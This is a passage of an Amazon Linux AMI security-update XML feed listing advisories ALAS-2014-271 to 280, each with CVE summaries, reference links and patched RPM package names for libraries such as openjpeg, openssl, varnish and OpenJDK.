arch="x86_64"><filename>Packages/glibc-headers-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.132.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.12-1.132.45.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.12-1.132.45.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.132.45.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.12-1.132.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-271</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-271: important priority package update for openjpeg</title><issued date="2014-01-14 15:55:00" /><updated date="2014-09-16 22:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6054:
Multiple heap-based buffer overflow flaws were found in OpenJPEG. An attacker could create a specially crafted OpenJPEG image that, when opened, could cause an application using openjpeg to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
CVE-2013-6052:
Multiple denial of service flaws were found in OpenJPEG. An attacker could create a specially crafted OpenJPEG image that, when opened, could cause an application using openjpeg to crash
CVE-2013-6045:
Multiple heap-based buffer overflow flaws were found in OpenJPEG. An attacker could create a specially crafted OpenJPEG image that, when opened, could cause an application using openjpeg to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
CVE-2013-1447:
Multiple denial of service flaws were found in OpenJPEG. An attacker could create a specially crafted OpenJPEG image that, when opened, could cause an application using openjpeg to crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1447" title="" id="CVE-2013-1447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6045" title="" id="CVE-2013-6045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6052" title="" id="CVE-2013-6052" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6054" title="" id="CVE-2013-6054" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1850.html" title="" id="RHSA-2013:1850" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openjpeg" version="1.3" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-1.3-10.7.amzn1.x86_64.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-debuginfo-1.3-10.7.amzn1.x86_64.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-devel-1.3-10.7.amzn1.x86_64.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="10.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-libs-1.3-10.7.amzn1.x86_64.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-libs-1.3-10.7.amzn1.i686.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-devel-1.3-10.7.amzn1.i686.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-debuginfo-1.3-10.7.amzn1.i686.rpm</filename></package><package name="openjpeg" version="1.3" release="10.7.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-1.3-10.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-272</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-272: important priority package update for pixman</title><issued date="2014-01-14 15:56:00" /><updated date="2014-09-16 22:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6425:
An integer overflow, which led to a heap-based buffer overflow, was found in the way pixman handled trapezoids. If a remote attacker could trick an application using pixman into rendering a trapezoid shape with specially crafted coordinates, it could cause the application to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6425" title="" id="CVE-2013-6425" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1869.html" title="" id="RHSA-2013:1869" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pixman-debuginfo" version="0.26.2" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/pixman-debuginfo-0.26.2-5.10.amzn1.x86_64.rpm</filename></package><package name="pixman" version="0.26.2" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/pixman-0.26.2-5.10.amzn1.x86_64.rpm</filename></package><package name="pixman-devel" version="0.26.2" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/pixman-devel-0.26.2-5.10.amzn1.x86_64.rpm</filename></package><package name="pixman" version="0.26.2" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/pixman-0.26.2-5.10.amzn1.i686.rpm</filename></package><package name="pixman-debuginfo" version="0.26.2" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/pixman-debuginfo-0.26.2-5.10.amzn1.i686.rpm</filename></package><package name="pixman-devel" version="0.26.2" release="5.10.amzn1" epoch="0" arch="i686"><filename>Packages/pixman-devel-0.26.2-5.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-273</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-273: important priority package update for openssl</title><issued date="2014-01-14 15:56:00" /><updated date="2014-09-16 22:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6450:
The DTLS retransmission implementation in OpenSSL through 0.9.8y and 1.x through 1.0.1e does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context by interfering with packet delivery, related to ssl/d1_both.c and ssl/t1_enc.c.
It was discovered that the Datagram Transport Layer Security (DTLS) protocol implementation in OpenSSL did not properly maintain encryption and digest contexts during renegotiation. A lost or discarded renegotiation handshake packet could cause a DTLS client or server using OpenSSL to crash.
1047840:
CVE-2013-6450 openssl: crash in DTLS renegotiation after packet loss
CVE-2013-6449:
The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client.
A flaw was found in the way OpenSSL determined which hashing algorithm to use when TLS protocol version 1.2 was enabled. This could possibly cause OpenSSL to use an incorrect hashing algorithm, leading to a crash of an application using the library.
1045363:
CVE-2013-6449 openssl: crash when using TLS 1.2 caused by use of incorrect hash algorithm
CVE-2013-4353:
A NULL pointer dereference flaw was found in the way OpenSSL handled TLS/SSL protocol handshake packets. A specially crafted handshake packet could cause a TLS/SSL client using OpenSSL to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4353" title="" id="CVE-2013-4353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6449" title="" id="CVE-2013-6449" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6450" title="" id="CVE-2013-6450" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0015.html" title="" id="RHSA-2014:0015" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1e-4.55.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1e-4.55.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1e-4.55.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1e-4.55.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1e-4.55.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1e-4.55.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1e-4.55.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1e-4.55.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1e-4.55.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1e" release="4.55.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1e-4.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-274</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-274: medium priority package update for nss</title><issued date="2014-01-14 15:56:00" /><updated date="2014-09-16 22:17:00" /><severity>medium</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2013:1861.html" title="" id="RHSA-2013:1861" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-tools" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.15.3" release="3.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.15.3-3.32.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.15.3-3.32.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.15.3-3.32.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.15.3-3.32.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.15.3-3.32.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.15.3-3.32.amzn1.i686.rpm</filename></package><package name="nss" version="3.15.3" release="3.32.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.15.3-3.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-275</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-275: medium priority package update for munin</title><issued date="2014-01-14 15:57:00" /><updated date="2014-09-16 22:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6359:
Munin::Master::Node in Munin before 2.0.18 allows remote attackers to cause a denial of service (abort data collection for node) via a plugin that uses "multigraph" as a multigraph service name.
1037888:
CVE-2013-6048 CVE-2013-6359 munin: two denial of service flaws fixed in 2.0.18
CVE-2013-6048:
The get_group_tree function in lib/Munin/Master/HTMLConfig.pm in Munin before 2.0.18 allows remote nodes to cause a denial of service (infinite loop and memory consumption in the munin-html process) via crafted multigraph data.
1037888:
CVE-2013-6048 CVE-2013-6359 munin: two denial of service flaws fixed in 2.0.18
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6048" title="" id="CVE-2013-6048" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6359" title="" id="CVE-2013-6359" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="munin-cgi" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-cgi-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-common" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-common-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-node" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-node-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-nginx" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-nginx-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-netip-plugins" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-netip-plugins-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-java-plugins" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-java-plugins-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-async" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-async-2.0.19-1.32.amzn1.noarch.rpm</filename></package><package name="munin-ruby-plugins" version="2.0.19" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/munin-ruby-plugins-2.0.19-1.32.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-276</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-276: medium priority package update for varnish</title><issued date="2014-01-14 16:09:00" /><updated date="2014-09-16 22:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4484:
Varnish before 3.0.5 allows remote attackers to cause a denial of service (child-process crash and temporary caching outage) via a GET request with trailing whitespace characters and no URI.
1025127:
CVE-2013-4484 varnish: denial of service handling certain GET requests
CVE-2013-0345:
915412:
CVE-2013-0345 varnish: world-readable log files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0345" title="" id="CVE-2013-0345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4484" title="" id="CVE-2013-4484" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="varnish-libs-devel" version="3.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-devel-3.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="varnish-libs" version="3.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-3.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="varnish" version="3.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-3.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="varnish-docs" version="3.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-docs-3.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="varnish-debuginfo" version="3.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-debuginfo-3.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="varnish-debuginfo" version="3.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-debuginfo-3.0.5-1.14.amzn1.i686.rpm</filename></package><package name="varnish-docs" version="3.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-docs-3.0.5-1.14.amzn1.i686.rpm</filename></package><package name="varnish-libs-devel" version="3.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-devel-3.0.5-1.14.amzn1.i686.rpm</filename></package><package name="varnish-libs" version="3.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-3.0.5-1.14.amzn1.i686.rpm</filename></package><package name="varnish" version="3.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-3.0.5-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-277</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-277: important priority package update for xorg-x11-server</title><issued date="2014-01-14 16:16:00" /><updated date="2014-09-16 22:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6424:
An integer overflow, which led to a heap-based buffer overflow, was found in the way X.Org server handled trapezoids. A malicious, authorized client could use this flaw to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6424" title="" id="CVE-2013-6424" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1868.html" title="" id="RHSA-2013:1868" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-devel" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.13.0-23.1.36.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.13.0" release="23.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.13.0-23.1.36.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-278</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-278: medium priority package update for gnupg</title><issued date="2014-01-14 16:18:00" /><updated date="2014-09-16 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4576:
It was found that GnuPG was vulnerable to side-channel attacks via acoustic cryptanalysis. An attacker in close range to a target system that is decrypting ciphertexts could possibly use this flaw to recover the RSA secret key from that system.
GnuPG 1.x before 1.4.16 generates RSA keys using sequences of introductions with certain patterns that introduce a side channel, which allows physically proximate attackers to extract RSA keys via a chosen-ciphertext attack and acoustic cryptanalysis during decryption. NOTE: applications are not typically expected to protect themselves from acoustic side-channel attacks, since this is arguably the responsibility of the physical device. Accordingly, issues of this type would not normally receive a CVE identifier. However, for this issue, the developer has specified a security policy in which GnuPG should offer side-channel resistance, and developer-specified security-policy violations are within the scope of CVE.
1043327:
CVE-2013-4576 gnupg: RSA secret key recovery via acoustic cryptanalysis
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4576" title="" id="CVE-2013-4576" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg-debuginfo" version="1.4.16" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.16-2.23.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.16" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.16-2.23.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.16" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.16-2.23.amzn1.i686.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.16" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.16-2.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-279</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-279: medium priority package update for quagga</title><issued date="2014-01-14 17:02:00" /><updated date="2014-09-16 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6051:
The bgp_attr_unknown function in bgp_attr.c in Quagga 0.99.21 does not properly initialize the total variable, which allows remote attackers to cause a denial of service (bgpd crash) via a crafted BGP update.
1043370:
CVE-2013-6051 quagga: bgp crash when receiving bgp updates
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6051" title="" id="CVE-2013-6051" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="quagga-contrib" version="0.99.21" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-contrib-0.99.21-6.12.amzn1.x86_64.rpm</filename></package><package name="quagga" version="0.99.21" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-0.99.21-6.12.amzn1.x86_64.rpm</filename></package><package name="quagga-debuginfo" version="0.99.21" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-debuginfo-0.99.21-6.12.amzn1.x86_64.rpm</filename></package><package name="quagga-devel" version="0.99.21" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-devel-0.99.21-6.12.amzn1.x86_64.rpm</filename></package><package name="quagga-devel" version="0.99.21" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-devel-0.99.21-6.12.amzn1.i686.rpm</filename></package><package name="quagga-contrib" version="0.99.21" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-contrib-0.99.21-6.12.amzn1.i686.rpm</filename></package><package name="quagga" version="0.99.21" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-0.99.21-6.12.amzn1.i686.rpm</filename></package><package name="quagga-debuginfo" version="0.99.21" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-debuginfo-0.99.21-6.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-280</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-280: critical priority package update for java-1.7.0-openjdk</title><issued date="2014-01-15 10:28:00" /><updated date="2014-09-16 22:20:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0428:
Multiple improper permission check issues were discovered in the CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0423:
It was discovered that the Beans component did not restrict processing of XML external entities. This flaw could cause a Java application using Beans to leak sensitive information, or affect application availability.
CVE-2014-0422:
Multiple improper permission check issues were discovered in the CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0416:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0411:
It was discovered that the JSSE component could leak timing information during the TLS/SSL handshake. This could possibly lead to disclosure of information about the used encryption keys.
CVE-2014-0376:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0373:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0368:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5910:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5907:
An input validation flaw was discovered in the font layout engine in the 2D component. A specially crafted font file could trigger Java Virtual Machine memory corruption when processed. An untrusted Java application or applet could possibly use this flaw to bypass Java sandbox restrictions.
CVE-2013-5896:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5893:
Multiple improper permission check issues were discovered in the CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-5884:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5878:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
